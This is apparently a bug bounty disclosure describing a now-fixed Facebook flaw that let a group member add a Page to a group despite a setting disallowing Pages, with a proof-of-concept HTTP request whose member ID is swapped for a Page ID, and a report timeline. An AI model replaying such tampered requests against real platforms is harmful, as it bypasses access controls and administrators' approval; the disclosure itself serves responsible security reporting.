[Facebook] Bypassing "Membership requests from Pages"
Any Page could have joined a Group when "Membership requests from Pages" is set to Disallowed.
POC -
A Group member will make the following request -
=====================================================================
POST /ajax/groups/members/add_post/?dpr=1 HTTP/1.1
Host: www.facebook.com
group_id=XXX&members[0]=XXX&message_id=groupsAddMemberCompletionMessage&recommendation_key=default_XXX_XXX_0_1542532051_312&ref=&source=suggested_members_new&__user=XXX
=====================================================================
Here the "members[0]=" value could be changed to a Page's ID which he wanted to invite.
If this request was made by the Mod of a Group, no notification was sent to the Admin for Membership approval.
Timeline -
Reported - Sunday, November 18, 2018
Marked as Duplicate - Wednesday, November 21, 2018
This is fixed now.